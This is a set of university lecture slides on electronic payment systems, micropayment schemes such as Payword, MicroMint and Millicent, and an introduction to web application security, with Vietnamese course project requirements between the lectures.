❑ dishonest merchants
◼ Credit card numbers can be protected against
❑ Eavesdroppers alone by encryption e.g. using SSL
❑ Dishonest merchants alone by using kind of pseudonyms of
credit card numbers
❑ Both eavesdroppers and dishonest merchants by encryption and
dual signatures

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 14
Electronic money
◼ Electronic representation of traditional money.
❑ A unit of e-money is usually referred to as an e- or digital coin
❑ Digital coins are “minted” i.e., generated by brokers
◼ If C wants to buy digital coins
❑ contacts a broker B, orders a certain amount of coins
❑ pays with “real” money
❑ C can make purchases from any M that accept the coins of that B
◼ M redeem at B’s the coins obtained from all C
❑ B takes back the coins and credits M’s account with real money.
◼ Typical electronic money transaction
❑ the issuer bank can be the broker at the same time.
❑ C & M must each have a current or checking account.
◼ The checking account: transition. form between the real money and e- money

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 15
Typical E-money transaction
(0) Coin withdrawal: C buys coins
and his checking account is
debited
(1) C uses the digital coins to
purchase in the Internet
(2) M sends C goods or services
❑ Since often used to buy low-value
services or goods M usually fills C’s
order before or even without payment
authorization

(3) Redemption: M then sends a request to the acquirer bank.


(4) Settlement: By using an interbank settlement mechanism similar,
the acquirer bank redeems the coins at the issuer bank and credits
M’s account with the equivalent amount

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 16
Electronic checks

◼ Electronic equivalents of traditional paper checks


◼ E-document that shows the following:
❑ Check number
❑ Payer’s name
❑ Payer’s account number and bank name
❑ Payee’s name
❑ Amount to be paid
❑ Currency unit used
❑ Expiration date
❑ Payer’s electronic signature
❑ Payee’s electronic endorsement

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 17
Typical e-check transaction
(1) C orders goods/services and
M sends back e- invoice
(2) As payment, C sends an
electronically signed e-check
❑ E-signature is a general term
that includes, among other
things, digital signatures
based on PKC
(3) As with paper checks, M
endorses the check

(4) Settlement: The issuer and the acquirer banks arrange transferring
the amount of sale from C’s account to M’s account.
(5) shipping/delivery

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 18
Electronic wallets

◼ Stored-value software or hardware devices


❑ loaded with specific value
◼ by increasing a currency counter
◼ by storing bit strings representing e-coins

◼ Current trend: using the smart card technology.


❑ CAFE project (Conditional Access for Europe, funded under the
European Community’s ESPRIT program
◼ a small portable computer with an internal power source
◼ a smart card

◼ Electronic money can be loaded online


◼ point-of-sale (POS) terminals

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 19
Smart card technology
◼ Plastic card with embedded microprocessor and memory
❑ used as either a credit card
❑ storage of electronic money or an electronic check device
❑ combination
◼ Smart card-based electronic wallets
❑ reloadable stored-value (prepaid) cards, for small payments
❑ Owner’s account is debited beforehand
❑ The owner can load the card at an ATM
❑ Shops with corresponding card readers at the cash register
◼ Examples
❑ Austrian Quick1 and Belgian Proton systems
❑ SET (Secure Electronic Transactions), an open specification for
secure credit card transactions over open networks
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 20
Electronic Payment Security

◼ The security problems of traditional payment systems


❑ Money can be counterfeited
❑ Signatures can be forged;
❑ Checks can bounce.
◼ Electronic payment systems have the same problems
and further:
❑ Digital documents can be copied perfectly and arbitrarily often
❑ Digital signatures can be produced by anybody who knows the
private key
❑ A payer’s identity can be associated with every payment
transaction

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 21
Electronic Payment Security
◼ E-commerce can not be widespread without additional
security measures which enable e-payment systems
◼ A properly designed e-payment system can provide better
security than traditional payment systems
◼ Three types of adversaries can be encountered:
❑ Outsiders eavesdropping and misusing the evavesdropped
data(e.g., credit card numbers)
❑ Mallicious attackers sending forged messages to authorized users
◼ cause abnormal system functioning
◼ or to steal the assets exchanged (e.g., goods, money)
❑ Dishonest users trying to obtain and misuse unauthorized payment
transaction data

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 22
Basic security requirements for e-
payment systems
◼ Payment authentication
❑ Both payers and payees must prove their payment identities
❑ This not necessarily imply that a payer’s identity is revealed(as if
anonymity is required)
◼ Payment integrity
❑ Payment transaction data cannot be modifiable by unauthorized
principals
◼ Payment authorization
❑ Ensures that no money can be taken from a customer’s account
or smart card without his explicit permission
◼ Payment confidentiality

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 23
Payment Security Services
◼ Satisfying the security requirements of E-payment
system➔ more than just communications security
services
◼ a payment system may have conflicting security
requirements
❑ E.g. wants anonymity for digital coins, but require identification of
double-spenders.
◼ an e- payment system for high-value transaction need a
more elaborate (so more expensive) security policy than
micropayment
◼ Payment security services fall into three main groups
depending on the payment instrument used.
Information Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 24
(Payment) transaction security services
◼ User anonymity
❑ protects against disclosure of a user.s identity in a network transaction;
◼ Location untraceability
❑ protects against disclosure of where a payment transaction originated;
◼ Payer anonymity
❑ protects against disclosure of a payer’s identity in a transaction;
◼ Payment transaction untraceability
❑ protects against linking of two different transactions of the same customer
◼ Confidentiality of payment transaction data
❑ selectively protects against disclosure of specific parts of transaction data to selected
principals from the group of authorized principals;
◼ Nonrepudiation of payment transaction messages
❑ protects against denial of the origin of transaction messages
◼ Freshness of payment transaction messages
❑ protects against replaying of payment transaction messages.

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 25
Digital money security

◼ Protection against double spending


❑ prevents multiple use of electronic coins
◼ Protection against forging of coins
❑ prevents production of fake digital coins by an
unauthorized principal
◼ Protection against stealing of coins
❑ prevents spending of digital coins by unauthorized
principals

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 26
E-check security

◼ The third group of services is based on the techniques


specific to payment systems using electronic checks as
payment instruments. There is an additional service
typical of electronic checks:

❑ Payment authorization transfer (proxy).makes possible the


transfer of payment authorization from an authorized principal to
another principal selected by the authorized principal.

Information Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 27
Network Security

Electronic Payment Systems II: E-cash,


Micro-payment
[Source: Various on-line slides and
documents]
Agenda

◼ Electronic commerce concepts


◼ Electronic payment systems overview
◼ E-payment security
◼ Payment security services

◼ Material in this twin lecture is based on this


book: “Security Fundamental for Electronic
Commerce” by Vesna Hassler [Artech House and
Pedrick Moore, technical editor (2001) ]
Desirable Properties of Digital Money
◼ Universality
❑ Accepted every where
◼ Transferability (electronically)
◼ Divisibility
◼ Non-forgeability
◼ Privacy
❑ No one except involved parties know the amount
◼ Anonymity
❑ No one can identify the payer, even the banks
◼ Off-line
❑ no on-line verification needed
Known system only satisfies some of these
Information Security by Van K Nguyen
Hanoi University of Technology 3
Electronic Cash

◼ Primary advantage: small-medium


purchases
❑ Payments of items less than $10
❑ Credit card transaction fees make small
purchases unprofitable
❑ Micropayments
◼ Payments for items costing less than $1

Information Security by Van K Nguyen


Hanoi University of Technology 4
Basic protocol
◼ Protocol basic steps: Merchant

1. C buys/withdraws e-cash from Bank


2. B➔C: e-coins 5
While charging given amount + fee
4
3. C➔M: e-coins
4. M ➔ Bank: ask to check e-coin Bank 3
validity
5. B ➔M: verifies coin validity 2
◼ Parties still to complete transaction
1
afterward merchant
❑ Present e-cash to issuing bank for deposit
once goods or services are delivered
Customer
Information Security by Van K Nguyen
Sep 2009 Hanoi University of Technology 5
Electronic Cash Issues

◼ E-coins must be spent only once


◼ Users enjoy anonymity just like with real cash
❑ Safeguards must be in place to prevent
counterfeiting
◼ Divisibility and Convenience
◼ Complex transaction (checking with Bank)
❑ Atomicity problem

Information Security by Van K Nguyen


Sep 2009 Hanoi University of Technology 6
Two storage methods

◼ On-line
❑ Users do not have possession personally of e-
coins
❑ Trusted third party such as online bank holds
customers’ cash accounts
◼ Off-line
❑ Users can keep e-coins in smartcards or software
wallets
❑ Fraud and double spending require tamper-proof
special techniques
Information Security by Van K Nguyen
Hanoi University of Technology 7
Advantages vs. Disadvantages

◼ Advantages of e-cash
❑ More efficient
❑ Lower transaction costs
❑ Available to anyone, unlike credit cards (which require
special authorization)
◼ Disadvantages
❑ Tax trail non-existent
❑ Money laundering, black mailing
❑ Susceptible to forgery

Information Security by Van K Nguyen


Hanoi University of Technology 8
Electronic Cash Security

◼ Complex cryptographic algorithms prevent


double spending
❑ Anonymity is absolute but double-spenders are
fully traceable
◼ Serial numbers can allow tracing to prevent
money laundering
❑ Does not prevent double spending, since the
merchant or consumer could be at fault

Information Security by Van K Nguyen


Hanoi University of Technology 9
Blind Signatures
◼ Goal
❑ to have the bank sign documents without knowing
what they are signing.

➔ Anonymity with authentication

Information Security by Van K Nguyen


Hanoi University of Technology 10
How to sign with blind fold?
◼ How?
Basic: Sign anything

1. You encrypt the message

2. Send it to the bank

3. The bank signs the message and


returns it

4. You decrypt the signed message

5. You spend it

Information Security by Van K Nguyen


Hanoi University of Technology 11
Cut and Choose
◼ Problem
How to make the bank trust the validity of the stuff in sealed envelope?
◼ Solution: the Cut-and-choose principle
1. Prepare n copies of the messages and
n different keys, and send them to the
bank

2. The bank requests the keys for and


opens n - 1 of them, and verifies them. It
then signs the remaining one.

3. The bank sends back the signed


message, which can then be
decrypted and spent
Information Security by Van K Nguyen
Hanoi University of Technology 12
Detecting Double Spending

Information Security by Van K Nguyen


Hanoi University of Technology 13
Existing E-cash Systems

◼ E-cash not popular in U.S., but successful


in Europe and Japan
❑ Reasons for lack of U.S. success not clear
◼ Manner of implementation too complicated
◼ Lack of standards and interoperable software that
will run easily on a variety of hardware and software
systems

Information Security by Van K Nguyen


Hanoi University of Technology 14
Existing E-cash Systems

◼ Checkfree
❑ Allows payment with online electronic checks
◼ Clickshare
❑ Designed for magazine and newspaper publishers
❑ Miscast as a micropayment only system; only one
of its features
❑ Purchases are billed to a user’s ISP, who in turn
bill the customer

Information Security by Van K Nguyen


Hanoi University of Technology 15
Existing E-cash Systems

◼ CyberCash
❑ Combines features from cash and checks
❑ Offers credit card, micropayment, and check payment services
❑ Connects merchants directly with credit card processors to provide
authorizations for transactions in real time
◼ No delays in processing prevent insufficient e-cash to pay for the
transaction
◼ CyberCoins
❑ Stored in CyberCash wallet, a software storage mechanism located
on customer’s computer
❑ Used to make purchases between .25c and $10
❑ PayNow -- payments made directly from checking accounts

Information Security by Van K Nguyen


Hanoi University of Technology 16
Existing E-cash Systems

◼ DigiCash
❑ Trailblazer in e-cash
❑ Allowed customers to purchase goods and services using
anonymous electronic cash
◼ Coin.Net
❑ Electronic tokens stored on a customer’s computer is used to make
purchases
❑ Works by installing special plug-in to a customer’s web browser
❑ Merchants do not need special software to accept eCoins.
❑ eCoin server prevents double-spending and traces transactions, but
consumer is anonymous to merchant

17
Micropayments
◼ Replacement of e-cash ◼ Best suit to small
❑ Cheaper transactions
◼ inexpensive to handle ❑ Beverages
❑ Recycling faster ❑ Phone calls
❑ Easier to count, audit, verify ❑ Tolls, transportation,
◼ Low transactions value, parking
Low cost for transaction ❑ Copying
process ❑ Internet content
❑ e.g. less than $1 ❑ Lotteries, gambling

Information Security by Van K Nguyen


Hanoi University of Technology
Micropayments
◼ Prepaid cards ◼ Saving in choosing
❑ Issued by non-banks technologies
❑ Represent call on future ❑ Selectively verifying (e.g. not
service all every transaction)
❑ Not money since usable only ❑ Light-weight cryptographic
with one seller tools
◼ Electronic purse (wallet) ◼ Float-preserving methods
❑ Issued by bank ❑ Prepayment
❑ Holds representation of real ❑ Grouping
money ◼ Aggregate purchases
❑ In form of a card (for face-to- (amortizing)
face or Internet use) ◼ Provide float to processor
◼ Loading (charging) with money ◼ Partial anonymity (individual
◼ Payment:removing money from the purchases disguised)
card)
◼ Clearance: money ➔ seller’s
account

Information Security by Van K Nguyen


Hanoi University of Technology
Remote Micropayments
◼ Remote micropayments
❑ Buyer is remote from seller’s
◼ Can’t insert card into vendor’s machine
◼ No physical goods, only information goods
◼ if micropayment will work, goods must be cheap, e.g. $0.01
❑ Traditional payment is too expensive
◼ Subscriptions, credit cards, checks, ACH or even PayPal

◼ Examples such as payment for view of


❑ web pages, stock quotes, news articles, weather report,
directory lookup
◼ Just required features are
❑ instant service
❑ transactions as cheap as 1¢ but in large number
❑ reasonable profit to payment provider

Information Security by Van K Nguyen


Hanoi University of Technology
Remote Micropayment Parties

◼ Users (buyers) User Vendor


◼ Vendors (sellers) Web Web
Browser Server
◼ Brokers (intermediaries)
❑ issue “scrip” (virtual money) Scrip
to users
❑ redeem scrip from vendors Broker
for real money Server

Broker
◼ Assumptions
❑ User-Broker relationship is long-term
❑ Vendor-Broker relationship is long-term
❑ User-Vendor relationship is short-term

Information Security by Van K Nguyen


Hanoi University of Technology
Micropayment Efficiency
◼ Providers need to process a peak load of at least 2500
transactions/second
❑ Using light-weight crypto tools
◼ Public-key cryptography is expensive: 1 RSA signature verifications = 1000
symmetric encryptions = 10,000 hashes
❑ Need to minimize Internet traffic
◼ Servers must be up
◼ More servers required, longer queues, lost packet delay
◼ Remove the provider from the process (user + vendor only)

◼ For small payment amounts, perfection is not needed


❑ Not a big matter if losing a micropayment
❑ All we need is to keep micropayment fraud low

Information Security by Van K Nguyen


Hanoi University of Technology
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of cryptography
◼ Micropayment parties: buyer, seller, broker
◼ Payword user generates his own coins!
◼ Fraud is not a serious problem with micropayments

Information Security by Van K Nguyen


Hanoi University of Technology
Payword Concept
◼ Secure payment scripts by using hash functions
❑ As a light-weight crypto tool, hash functions are easy to
compute but their one-way property has enough to protect
against stealing small values
◼ Suppose we need N “coins”
❑ Start with a random number W N
❑ Hash it N times to form W 0

WN W N-1 W N-2 • • • W1 W0
W N-1 = H(W N ) W N-2 = H(W N-1 ) W 1 = H(W 2 ) W 0 = H(W 1 )

❑ These N numbers will be used as “coins”, or paywords,each


of which is worth one unit
❑ Vendor receives W0 to start

Information Security by Van K Nguyen


Hanoi University of Technology
Payword
◼ Based on these “paywords” strings that will
be accepted by vendors for purchases
❑ First, user authenticates his/her to a broker with
one signature verification, paying “real” money for
paywords
❑ User sets up with broker a linked chain of
paywords to be used with a specific vendor
◼ Linking is used to make authentication of the paywords can be
aggregated, so the cost very cheap
❑ User pays vendor by revealing paywords to vendor
◼ Marginal cost of a payment: one hash computation

Information Security by Van K Nguyen


Hanoi University of Technology
Payword
◼ User sets up Payword account with a broker (pays
real money)
❑ Broker issues user a “virtual card” (certificate)
◼ broker name, user name, user IP address, user public key
❑ Certificate authenticates user to vendor
❑ User creates payword chains (typical length: 100 units)
specific to a vendor

Information Security by Van K Nguyen


Hanoi University of Technology
Buying Paywords
◼ User visits broker over secure channel (e.g. SSL),
giving coordinates of bank account or credit card:
U, AU, PKU, TU, $U
USER USER USER USER COORDINATES OF BANK
NAME ADDRESS PUBLIC KEY CERTIFICATE ACCOUNT OR CC

◼ Broker issues a subscription card


CU = { B, U, AU, PKU, E, IU } SKB

BROKER EXPIRATION USER INFORMATION BROKER


NAME DATE (CARD #, CREDIT LIMIT) PRIVATE KEY

◼ Vendor will deliver goods only to AU

Information Security by Van K Nguyen


Hanoi University of Technology
Making Payment
◼ Commitment to a payword chain = promise by user to
pay vendor for all paywords given out by user before the
date in D (expiration date)
❑ N = value in jetons needed for purchases (1 payword = 1 jeton)
❑ W N = last payword, a random value chose by user
◼ User creates payword chain backwards by hashing W N
W N-1 = H(W N); W N-2 = H(W N-1) = H(H(W N)) , etc., giving
 CAN EASILY COMPUTE THIS WAY
W = { W 0, W 1, . . . W N-1, W N } → DIFFICULT TO COMPUNTE THIS WAY

◼ User “commits” this chain to a vendor, sends


M IS VENDOR EXPENSIVE: REQUIRES
SPECIFIC AND
USER-SPECIFIC
M = { V, CU, W 0, D, IM } SKU DIGITAL SIGNATURE

(NO USE TO EXPIRATION


VENDOR “FIRST” DATE OF
EXTRA INFORMATION USER
ANYONE ELSE) NAME (VALUE OF CHAIN) PRIVATE KEY
PAYWORD COMMITMENT

Information Security by Van K Nguyen


Hanoi University of Technology
Making Payment, cont.
◼ Vendor can use PKU and PKB to read the commitment to
know that U is currently authorized to spend paywords.
◼ User “spends” paywords with the vendor in order
W 1 , W 2 , . . . , W N . To spend payword W i, user sends
the vendor the unsigned token P = { W i, i }.
◼ To verify that P is legitimate, vendor hashes it i times to
obtain W 0 . If this matches W 0 in the commitment, the
payment is good.
◼ If V stores the last payword value seen from U, only one
hash is needed. (If last hash was W i, when vendor
receives W i+1, can hash it once and compare with W i .)
◼ P does not have to be signed because hash is one-way.

Information Security by Van K Nguyen


Hanoi University of Technology
Settlement with Payword
◼ Even if vendor has no relationship with broker B, can still
verify user paywords (only need broker’s public key)
◼ For vendor to get money from B requires relationship
◼ Vendor sends broker B a reimbursement request for
each user that sent paywords with M, W L (last payword
received by vendor)
◼ Broker verifies each commitment using PKU and
performs L hashes to go from W L to W 0
◼ Broker pays V, aggregates commitments of U and bills
U’s credit card or debits money from U’s bank account

Information Security by Van K Nguyen


Hanoi University of Technology
Payword Payment Properties
◼ Payment and verification by vendor are offline (no use of
a trusted authority).
◼ Payment token P does not reveal the goods
◼ Fraud by user (issuing paywords without paying for
them) will be detected by the broker; loss should be
small
◼ Vendor keeps record of unexpired paywords to guard
against replay

Information Security by Van K Nguyen


Hanoi University of Technology
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of cryptography
◼ Micropayment parties: buyer, seller, broker
◼ Payword user generates his own coins!
◼ Fraud is not a serious problem with micropayments

Information Security by Van K Nguyen


Hanoi University of Technology
MicroMint
◼ Brokers produce “coins” having short lifetimes, sell
coins to users
◼ Users pay vendors with coins
◼ Vendors exchange the coins with brokers for “real”
money

PURCHASE NEW COINS


BROKER EXCHANGE COINS FOR
RETURN UNUSED COINS OTHER FORMS OF VALUE

NEW COINS

SPENDING OF COINS
CUSTOMER VENDOR
TRANSFER OF INFORMATION
SOURCE: SHERIF

Information Security by Van K Nguyen


Hanoi University of Technology
Minting Coins in MicroMint
◼ Idea: make coins easy to verify, but difficult to create
(so there is no advantage in counterfeiting)
◼ In MicroMint, coins are represented by hash-function
collisions, values x, y for which H(x) = H(y)
◼ If H(•) results in an n-bit hash, we have to try about
2n/2 values of x to find a first collision
◼ Trying c•2n/2 values of x yields about c2 collisions
◼ Collisions become cheaper to generate after the first
one is found

Information Security by Van K Nguyen


Hanoi University of Technology
Coins as k-way Collisions
◼ A k-way collision is a set { x1, x2, . . ., xk } with
H(x1) = H(x2) = . . . = H(xk)
◼ It takes about 2n(k-1)/k values of x to find a k-way
collision
◼ Trying c• 2n(k-1)/k values of x yields about ck collisions
◼ If k > 2, finding a first collision is slow, but subsequent
collisions come fast
◼ If a k-way collision { x1, x2, . . ., xk } represents a coin,
easily verified by computing H(x1), H(x2), . . ., H(xk)
◼ A broker can easily generate 10 billion coins per
month using one machine

Information Security by Van K Nguyen


Hanoi University of Technology
Selling MicroMint Coins
◼ Broker generates 10 billion coins and stores (x, H(x))
for each coin, having a validity period of one month
◼ The function H changes at the start of each month
◼ Broker sells coins { x1, x2, . . ., xk } to users for “real”
money, records who bought each coin
◼ At end of month, users return unused coins for new
ones

Information Security by Van K Nguyen


Hanoi University of Technology
Spending MicroMint Coins
◼ User sends vendor a coin { x1, x2, . . ., xk }
◼ Vendor verifies validity by checking that
H(x1) = H(x2) = . . . = H(xk). (k hash computations)
◼ Valid but double-spent coins (previously used with a
different vendor) cannot be detected at this point
◼ At end of day, vendor sends coins to broker
◼ Broker verifies coins, checks validity, checks for
double spending, pays vendor
◼ (Need to deal with double spending at this point)

Information Security by Van K Nguyen


Hanoi University of Technology
Detecting MicroMint Forgery
◼ A forged coin is a k-way collision { x1, x2, . . ., xk }
under H(•) that was not minted by broker
◼ Vendor cannot determine this in real-time
◼ Small-scale forgery is impractical
◼ Forged coins become invalid after one month
◼ New forgery can’t begin before new hash is announced
◼ Broker can issue recall before the month ends
◼ Broker can stay many months ahead of forgers

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent
◼ Vendors produce vendor-specific “scrip”, sell to brokers
for “real” money at discount
◼ Brokers sell scrip from many vendors to many users
◼ Scrip is prepaid: promise of future service from vendor
◼ Users “spend” scrip with vendors, receive change

USER EXCHANGES BROKER BROKERS PAY


BROKER SCRIP FOR FOR VENDOR SCRIP
VENDOR SCRIP ($$$ MONTHLY)
(AS NEEDED) USER BUYS BROKER
SCRIP ($ WEEKLY)

USER SPENDS VENDOR


SCRIP FOR INFORMATION
USER (¢ DAILY) VENDOR
TRANSFER OF INFORMATION
(CHANGE IN MESSAGE HEADER) SOURCE: COMPAQ

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent
◼ Broker
❑ issues broker scrip to user
❑ exchanges broker scrip for vendor scrip
❑ interfaces to banking system
❑ collects funds from users
❑ pays vendors (less commission)
◼ User
❑ buys broker scrip from brokers
❑ spends by obtaining vendor-specific scrip from broker
◼ Vendor
❑ sells scrip to brokers
❑ accepts vendor scrip from users
❑ gives change to users in vendor scrip

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent Components
◼ Wallet
❑ integrated with browser
as a “proxy” Tokens Vendor
Wallet Server
❑ User Interface
(content, usage)
New Spent
◼ Vendor software tokens tokens
❑ easy to integrate User Vendor
as a web relay
❑ utility for price
management Broker $
$
◼ Broker software Server
❑ handles real money
Broker

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent System Architecture
Broker (tens?)

Broker Vendor (thousands)


Server
Price
File Price
Configurator
HTTP Document
User (millions
Tree
of consumers) Site Map

Browser Wallet Vendor Web


Server Server
HTTP
Browser Wallet
Cache Contents

Information Security by Van K Nguyen


Hanoi University of Technology
Millicent Scrip Verification
• Token attached to HTTP requests
• Scrip can not be: Client Vendor
– Spent twice
Web Web
– Forged Browser Server
– Stolen
• Scrip is validated:
– By each vendor, on the fly
Scrip
– Low computational overhead
– No network connection
Broker
– No database look up Broker Server

Information Security by Van K Nguyen


Hanoi University of Technology
MilliCent Scrip

Vendor Value ID# Cust ID# Expires Props Stamp Secret

wellsfargo.com / 0.005usd / 0081432 / 101861 / 19961218 {co=us/st=ca} 1d7f4a734b7c02282e48290f04c20

Information Security by Van K Nguyen


Hanoi University of Technology
Vendor Server
◼ Vendor server acts as a proxy
for the real Web server
◼ Vendor server handles all
requests: Vendor Web
❑ Millicent Server Server
❑ relay to web-server
◼ Millicent processing:
❑ Validates scrip and generates
change Price Document
File Tree
❑ Sells subscriptions
❑ Handles replays, cash-outs, and refunds Vendor Site

Information Security by Van K Nguyen


Hanoi University of Technology
Major Ideas
◼ Micropayment systems must be fast and cheap
◼ They MUST lack features of higher-value payment
systems
◼ Use of hashing instead of cryptography
◼ Micropayment parties: buyer, seller, broker
◼ Micromint models minting coins
❑ High overhead to prevent counterfeiting
◼ Fraud is not a serious problem with micropayments

Information Security by Van K Nguyen


Hanoi University of Technology
Yêu cầu Bài tập lớn
◼ Yêu cầu của đề cương BTL (cuối tuần 10):
❑ Tên đề tài
❑ Viết abstract (1 paragraph) mô tả tóm tắt về
nội dung báo cáo.
❑ Kế hoach- Nội dung chi tiết
◼ Cấu trúc phần/mục
◼ Nêu title của mỗi phần
◼ Nhiệm vụ của thành viên trong mỗi phần
◼ Các từ khóa (keyword) trong phần này
◼ 1 paragraph mô tả tóm tắt (abtract) của phần này.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 47
◼ Báo cáo (nộp tuần 13, trình bày tuần 14 và 15)
❑ Sử dụng đúng cấu trúc phần/mục đã nêu trong đề cương
❑ Các thành viên thực hiện đúng theo phân công
❑ Tài liệu tự viết, không được sao chép nguyên đoạn/câu mà không nêu rõ tài
liệu trích dẫn.
❑ Các báo cáo cùng chủ đề sẽ bị đánh giá chặt chẽ hơn, theo tiêu chí riêng;
giống nhau sẽ bị cho điểm thấp; Nếu báo cáo 2 nhóm giống nhau quá
nhiều sẽ bị chia điểm ( ví dụ: cùng 3= 6/2)
❑ Nội dung báo cáo nên đầu tư vào các phần có tự phân tích, đánh giá (nhận
định, so sánh) của riêng mình; sao chép kiến thức (kể cả dịch) là rất ít giá
trị. Để có báo cáo sâu sắc cần biết thể hiện tư duy độc lập, khả năng tổng
hợp và phân tích.
❑ Cách viết: học tập các bài báo khoa học được đăng tải ở các tạp chí/hội
nghị chuyên môn
❑ Báo cáo không cần dài, không quá 20 trang
❑ Chuẩn bị slides thuyết trình không quá 30 slides (có thể trình bày từ 15-25
phút)
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 48
Network Security
Van K Nguyen - HUT

Web application security


Yêu cầu Bài tập lớn
◼ Yêu cầu của đề cương BTL (cuối tuần 10):
❑ Tên đề tài
❑ Viết abstract (1 paragraph) mô tả tóm tắt về
nội dung báo cáo.
❑ Kế hoach- Nội dung chi tiết
◼ Cấu trúc phần/mục
◼ Nêu title của mỗi phần
◼ Nhiệm vụ của thành viên trong mỗi phần
◼ Các từ khóa (keyword) trong phần này
◼ 1 paragraph mô tả tóm tắt (abtract) của phần này.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 2
◼ Báo cáo (nộp tuần 13, trình bày tuần 14 và 15)
❑ Sử dụng đúng cấu trúc phần/mục đã nêu trong đề cương
❑ Các thành viên thực hiện đúng theo phân công
❑ Tài liệu tự viết, không được sao chép nguyên đoạn/câu mà không nêu rõ tài
liệu trích dẫn.
❑ Các báo cáo cùng chủ đề sẽ bị đánh giá chặt chẽ hơn, theo tiêu chí riêng;
giống nhau sẽ bị cho điểm thấp; Nếu báo cáo 2 nhóm giống nhau quá
nhiều sẽ bị chia điểm ( ví dụ: cùng 3= 6/2)
❑ Nội dung báo cáo nên đầu tư vào các phần có tự phân tích, đánh giá (nhận
định, so sánh) của riêng mình; sao chép kiến thức (kể cả dịch) là rất ít giá
trị. Để có báo cáo sâu sắc cần biết thể hiện tư duy độc lập, khả năng tổng
hợp và phân tích.
❑ Cách viết: học tập các bài báo khoa học được đăng tải ở các tạp chí/hội
nghị chuyên môn
❑ Báo cáo không cần dài, không quá 20 trang
❑ Chuẩn bị slides thuyết trình không quá 30 slides (có thể trình bày từ 15-25
phút)
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 3
Agenda

◼ Web application (in)security


◼ From hacker’s point of view
◼ Common Attack: Code injection
◼ Common Attack: Cross-site scripting

Material in this 2-session lecture is based on


this book: “The Web Application Hacker's
Handbook: Discovering and Exploiting Security
Flaws” by Dafydd Stuttard and Marcus Pinto [Wiley
(October 22, 2007) ] – below we call it by
WebHackerHandbook
Web application security

◼ The evolution of Web applications


All kinds of things we could do online
❑ Shopping (Amazon)
❑ Social networking (FaceBook, MySpace)

❑ Banking (Citibank)

❑ Web search (Google)

❑ Auctions (eBay)

❑ Gambling

❑ Web mail (Gmail, YahooMail, Hotmail)

❑ Interactive information (Wikipedia)

… The list can go on as long as one bother to add

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 5
Web application security
◼ Why security problems:
❑ New technologies ➔ introduced new possibilities for
exploitation
◼ the most significant battleground between attackers and
people/organization with computer resources and data to defend
❑ False perception of security
◼ “This site is secure”
“This site is absolutely secure. It has been designed to use 128-bit Secure
Socket Layer (SSL) technology to prevent unauthorized users from viewing
any of your information. You may use this site with peace of mind that your
data is safe with us.”
◼ Users are urged to trust the sites’ security just because of their use of
certificates, SSL/TLS (cryptographic tools) …
◼ In fact, the majority of web applications are insecure, and in ways
that have nothing to do with SSL/TLS.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 6
Web application security

◼ SSL/TLS is important but


absolutely not everything
we need for security
❑ SSL is for confidentiality
and integrity of transmitted
data; it is just like a
construction block not the
full house
❑ SLL do nothing to prevent Some common web vulnerabilities found in
against these sample of 100+ sites -- WebHackerHandbook
vulnerabilities mentioned

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 7
The Core Security Problem:
Users Can Submit Arbitrary Input
◼ Users can interfere with any piece of data
transmitted between the client and the server
❑ request parameters, cookies, and HTTP headers
◼ Users can send requests and can submit
parameters at a patterns different than what the
application developers expects
◼ Users are not restricted to using only a web browser
to access the application.
❑ There are numerous widely available tools that operate
alongside, or independently of, a browser, to help attack
web applications.
Network Security by Van K Nguyen
Sep 2010 Hanoi University of Technology 8
Examples of cheating
◼ Cheating is mainly based on sending input to the server which is
crafted to cause some event that was not expected or desired by
the application’s designer:
❑ Changing the price of a product transmitted in a hidden HTML form
field ➔ purchase the product for a cheaper
❑ Modifying a session token transmitted in an HTTP cookie ➔ hijack
the session of another authenticated user.
❑ Removing certain parameters that are normally submitted ➔ exploit
a logic flaw in the application’s processing.
❑ Altering some input that will be processed by a back-end database
➔ inject a malicious database query ➔ obtain sensitive data
◼ Can SSL help?
❑ Absolutely Not! SSL does nothing to stop an attacker from
submitting crafted input to the server.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology
SSL can’t stop hacker creating
malicious input

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 10
Critical Factors leading to this insecurity

◼ Immature Security Awareness


◼ In-House Development
◼ Deceptive Simplicity
❑ With today’s web dev. tech., even a novice programmer →
powerful app from scratch in a short time.
❑ But, a HUGE difference btw producing code that is
functional and code that is secure
◼ Rapidly Evolving Threat Profile
◼ Resource and Time Constraints
◼ Overextended Technologies

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 11
Core Defense Mechanisms
The defense mechanisms employed by web applications comprise
the following core elements:
◼ Handling user access to the application’s data and functionality
➔ prevent users from gaining unauthorized access.
◼ Handling user input to the application’s functions ➔ prevent
malformed input from causing undesirable behavior.
◼ Handling attackers ➔ the application behaves appropriately
when being directly targeted
❑ Using suitable defensive measures to frustrate the attacker

◼ Managing the application itself


❑ Enabling administrators to monitor its activities and configure its
functionality.

Network Security by Van K Nguyen


Sep 2010 Hanoi University of Technology 12
